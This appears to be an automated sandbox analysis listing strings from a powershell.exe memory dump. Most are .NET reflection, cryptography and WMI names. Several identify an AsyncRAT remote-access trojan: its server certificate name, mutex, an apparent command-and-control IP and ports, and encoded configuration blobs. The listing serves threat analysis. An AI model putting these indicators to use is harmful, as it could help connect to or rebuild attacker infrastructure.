Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: containsgenericparameters
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: methodimplementationflags
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ispublic
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isprivate
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isfamily
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isfamilyandassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isfamilyorassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isstatic
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isfinal
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isvirtual
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ishidebysig
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isabstract
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isspecialname
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isconstructor
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getcustomattributes
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isdefined
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getcustomattributesdata
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_declaringtype
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_reflectedtype
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_membertype
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_metadatatoken
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_module
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_issecuritycritical
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_issecuritysafecritical
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_issecuritytransparent
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getparameters
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getmethodimplementationflags
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_methodhandle
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_attributes
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_callingconvention
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getmethodbody
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_returntype
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_returntypecustomattributes
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_returnparameter
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getbasedefinition
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: createdelegate
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: makegenericmethod
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getgenericarguments
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getgenericmethoddefinition
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isgenericmethod
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isgenericmethoddefinition
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_containsgenericparametersxn
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getobjectdata
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_methodimplementationflags
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_ispublic
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isprivate
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isfamily
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isfamilyandassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isfamilyorassembly
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isstatic
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isfinal
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isvirtual
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_ishidebysig
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isabstract
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isspecialname
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_isconstructor
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: get_customattributes
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: isdefined@n
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: gettypeinfocount
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: gettypeinfo
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getidsofnames
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: invoke@n
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getobjectdata`4
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: !y4t
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: parameters
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: x1hbasqbf/uln4ddrfkya3nlomnp1pmzxlgk7vlamxvb9p88lbnng2izkbzxmsv4etmr+xsg5wgobkiu9g9zuia==
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: xhgf1anrgjgqz1kfti6vc2fxmux2klwne8+oxdliawzyhyxa2fn/jmakuq1puvagcvgsro91mm8njekvjs1ejlq==
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: xwwroxrvfiskpnibvjnadxkm/p1nnvmvkoco1tbnvczsal3rakreoya5w2xspkhqw/beflnhlwfp/4qcza9brkw==
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: x6oqkn1wbvaja/ljgqmy+f7vrac+ko+x35tvs2/4bhnqlaftg9wehtgqtsdexqosvcoxcminecidzxum3ip+o9a==
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: %appdata%
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ,ujc3awfum0wymtrmaw1kz2qwcvbvvdbpsdi3nguxmu0=
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: luageoxckpkatwtpukcnmdfzljrmolukqzz2qgoyty0ui7g9lfeuffq1pki7ioh4faexmtywfrbbhpuqvqvftb5m2vpxwjlqzy16kahzil9c=
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ,p0tk/2de/ktuoriljp6gto8ds7hquit1rd5qviqdfa7vp/gxzpviap3lzfqftur/i0yqb0vf4capuyw+wwpqwipxrhx7p35w25bzjdrig1xi8om1lesifnjmuyybp0azd1l9a2cvakq6tvz+kbyf2lb1jz7sppjw0z7di9a7cjlxmalp3wvhgrockorrqwzsxvwyrxdab4k2e4vj4gyyz1/3znfqvzcols4ig3aojnqmn7vvixvh9d0ugf2zpbqvnbzy5yktwifpjjhbemuwutayitlabsgkrihh2ahchruhde/uhr0q6iwo0aiefknrfedvsjxtogs099lf0joimuppnl0yrt/pr2ljr6g5m/+loyn1qeisgtlxcxun/6dwvyfuvazfu07lpvxoasjffbo2foeenx8o2vr4xybktk45fnjl4mdog8mq2jiroqexmeqbkva39oq/qszs5exfd8sezrgl7vq4r9mlr0585tkszlliddiptza7kqkwclsons7xo925fdzke/pcrptqw5anljmmpmwzpc1tkbw747okxlgmyzu/opuuoddxwkdstmwm00efmdc3pccgtul7locxxew+mp6arsljmhgb+pn1ci64ajb2vk+iany8zappwvbp69nmve6uh2ujvilenfd05mkzrnr3lizwykn8jfybvohw+nwwhacfk2kqj9ctibgnvdseheu1e4+kqw6uzyvkv36t3te0lwpzzh19ykpim3ab1lnvnc2tojrzgmk1nvmsmdvv9gpzyxflut2z2s68yppxx8hlxkp06ntq6mlvkhjiedyzmgokdowb7rzp5lnmetnigpchwosd2u9obttytcq3h2eacd1jazbm/mpk7jhugpnfyx7sm71br5ixxpmac1ifeaqsvz38oe79ppjsy+tilw1de+ia7roo+qhptng03ui/se9g78mkgbqmdbxotvazggl9pwipgbjarepfj+ejo7mixklq3nxtr2opkxl52i4mrnczfjhmsc9sfjzqahtx5zyy/fataonvltx/ml/luobchmgkhz4ndsk+/l4ao5m2cswo2p8z4nd5ypch2+gn3vwa9tpvnn4w94leqjv7ut8qwtbedbjkim/lgri3lrt9/crsm9snx9pfmw6glekyj8z3tbhbhh46qdhegl1wtyakg30kgwuncuwvoxpoxxxjiy28slkvaqaqdlupaalqubhsgkt6vnhb2q8tcy+2i31qggpjovuvlyey+1+b+x+idfae9po+ms2rphwcgslkd3t1pjj8ty1osz/vljdu5ypm1vg40snyrg9widc+tkbuqvszu3barqjiifyxvzoj6v5hh6cpyc2f2tci17adgi/gnn1jnu6fq9qyb1sxlj2exxd3//ddzl2nga+xwk+hx2tjfc8mbdakhpjclkdrt+ze0tkusm9byjrajdmt0rix+l3xlv0tkcvcluvusx/+zmsdntiyvxw2r3wf7a818gtirutlltg4ph2ddlvlckxkarwmreqv7nfk0kesplpdhbo3/sc4boiq2lrvdzh1yxnlzdhvmlxbvtl/agob22+kcaj+nksn8tayz98bndno1zocqblcgzgslonika3fmyk60censmy9z6mt09jbgorrndaj7sbgsfoyzntqnnxpxuos+4heomftr53t+om7ooojvh5awi6cr1ftdsxnmwup+oextfrhhoaif8idcw5nsthtscgluibmja5oa9zt2pjj02ttsqvgsi82sa/8yzhwjm4oijs22rrk75eykbvyhxihyzopx4r3a/hdqpdfnbqrohahe43oxb1vuazkvwqkxrberbnx7bso1rwsfm2o+4rkstbbf9mzywntwe74r7mcip0x62clmlpvekpqzxm9/bjy/tzt3pxchpaowkdyllm8nrd9apyot/uxbc7+lhs8pakxyqxeumdoilb6wx3lbxrrlaaorjlhetpgmqm/1utgpsc5u8janc+nnuwo525uimo7zi+tomdxzqa3rv8evoytdbzuok2sme0mp6p5itouyw6el8zwd69kiuqzmpih+kbjfadjve4sqjyt4fabae6ctmuemgjx7qngm2rfiwruiqmq+j8yrdblukdpsgbpilu1p/d4ks0mytveammo1heduroxhx/kp1zoaio0biqgbgxo/ftfexermxdavzk3vwqwxjjko4n1cwai5ymthr+eg6faar6b3oys5x/+mo0mslub0dbiyui3nso8zhdblry/z+ykghyy7u8z/qv0ywphvkqwo7ipmn617lruxr/lvsbm264zafpt/x1a9dx2qocelixxuek=
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: xwtjtfz2jo44kpvo1+rqmxe2gmqtdw8yoiqxanwd0vgyxzshjt/1pogflac7dj4ovvshrxizwqfobeojsnxeoqq==
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: x+y/gq9icbaedbvxorgyvy+mfotpsxzq4db6mypghehij0d8lfproelacz1mgtyykbrzeyyftxbupjldrt0zpva==
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: xvhz6pfkdnrpciv16lytqjkkcybf2+xbawv4sf7gbgc0bkc/emg84plj86spahevjvtysyyi7sf/k0nde4oxjvg==
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: xaq8pujtzgqa895hmz47wonckq52tzswaqm742awi1ew7ixqqujs+b5zkjhi9naynmcfmaw6km5lb3vy2+ted6w==
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: r77ian3l214limjgd0qpot0oh274e11m8
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 5microsoft enhanced rsa and aes cryptographic provider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: amicrosoft enhanced rsa and aes cryptographic provider (prototype)
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: xswitch.system.security.cryptography.aescryptoserviceprovider.dontcorrectlyresetdecryptor
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: )testswitch.localappcontext.disablecaching
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: system.appcontext
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: trygetswitchx
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: .netframework
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: profile
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: .netcore
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 87,85
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 46.1.54.174
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 0.5.7b
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: asyncmutex_6si8okpnk
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: strings
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 3f7cca23b5bf314e6016
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: v0hwwj4lpz7t+thqeay1tnpss0ivkwm2ah0lx+adakky8vvbt7hbtbiuusoxfck4kkhv/pfnzsuoc38pjssvqwfuag1olpiotcuqesjjornk0+zveisdfube1rj11tx6/7htc3hrs3ezdc6isgt0f3ho3m4skxtjopif+iu6moqw1rn12psv41+zoatfyiggsoiml4ebtxonxcxpitljorfcxiknv88uffwgkntnkjei4cnjyvw2hritiudsbobbujo0b21/wrxj2fxcgli2ebqadevjeozqpvcqold764hxs5aokmqypdctczfvar/019jxd7dxj1oqqwhaawyqs3lz70ohpp5kjn7wsfofsgmirz8lztk4pltjep6oxmfnn2kiisfxk1cjl19o1/m91fdjo4owpleio0u1/bazm0l25k583u/fgws31aqq7zviea2pr3mhnkg1h7/cazeylxvbxo6w5oizqpjx4fggyd0qjg83dnxd1exbru+5njtsjz6fxnk4uwg4o6dsj6fytyvb7cgsqo4vzgequjoc024rl3ldb6cnfpknvhql6uunjtrduy7kgqra1cbe3j6gv9j460bcwhy6ez50j2jtjnlinhxeub152g85dhdr/fr3u/lrxzcxcxvwlqbv43jkodq9csy2tbcsgb6ipnesk8u=
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.2.840.113549.1.1.1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.3.14.3.2.26
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 2.16.840.1.101.3.4.2.1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 2.16.840.1.101.3.4.2.2
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 2.16.840.1.101.3.4.2.3
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 6system.security.cryptography.sha1cryptoserviceprovider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: (system.security.cryptography.sha1managed
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: *system.security.cryptography.sha256managed
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: *system.security.cryptography.sha384managed
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: *system.security.cryptography.sha512managed
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.3.36.3.2.1
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.2.840.113549.2.5
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 5system.security.cryptography.md5cryptoserviceprovider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 'system.security.cryptography.md5managed
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.2.840.113549.1.9.16.3.6
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: tripledeskeywrap
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.2.840.113549.3.2
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 5system.security.cryptography.rc2cryptoserviceprovider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.3.14.3.2.7
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 5system.security.cryptography.descryptoserviceprovider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 1.2.840.113549.3.7
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ;system.security.cryptography.tripledescryptoserviceprovider
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: gethostaddresseshe
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 9{0:x4}:{1:x4}:{2:x4}:{3:x4}:{4:x4}:{5:x4}:{6}.{7}.{8}.{9}
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: remoteendpoint
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: {0}:{1}
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: [{0}]:{1}
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: unknown_errorh3
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: cn=asyncrat server
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: clientinfo
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: microsoft
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: 32bit
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: admin
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: antivirus
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: installed
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: win32_operatingsystem
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: select x
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: $51372ae0-cae7-11cf-be81-00aa00a2fa25
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: $000001ce-0000-0000-c000-0000000000468
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: from
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: select * from meta_class
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: where
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: //./root/cimv2
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: ssystem.management.wbemdefpath, system.management, version=4.0.0.0, culture=neutral, publickeytoken=b03f5f7f11d50a3a
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: initialize
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: \wminet_utils.dll
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: resetsecurity
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: setsecurity
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: blessiwbemservices
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: blessiwbemservicesobject
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getpropertyhandle
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: writepropertyvalue
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: clone
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: verifyclientkey
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getqualifierset
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getnames
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: beginenumeration
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: endenumeration
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getpropertyqualifierset
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getobjecttext
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: spawnderivedclass
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: spawninstance
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: compareto
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getpropertyorigin
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: inheritsfrom
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getmethod
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: putmethod
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: deletemethod
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: beginmethodenumeration
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: nextmethod
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: endmethodenumeration
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getmethodqualifierset
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getmethodorigin
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: qualifierset_get
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: qualifierset_put
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: qualifierset_delete
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: qualifierset_getnames
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: qualifierset_beginenumeration
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: qualifierset_next
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: qualifierset_endenumeration
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getcurrentapartmenttype
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: getdemultiplexedstub
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: createinstanceenumwmi
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: createclassenumwmi
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: execquerywmi
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: execnotificationquerywmi
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: putinstancewmi
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: putclasswmi
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: cloneenumwbemclassobject
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: connectserverwmi
Source: powershell.exe, 0000000E.00000002.497299343.0000013384E49000.00000004.00000001.sdmp	Binary or memory string: geterrorinfo
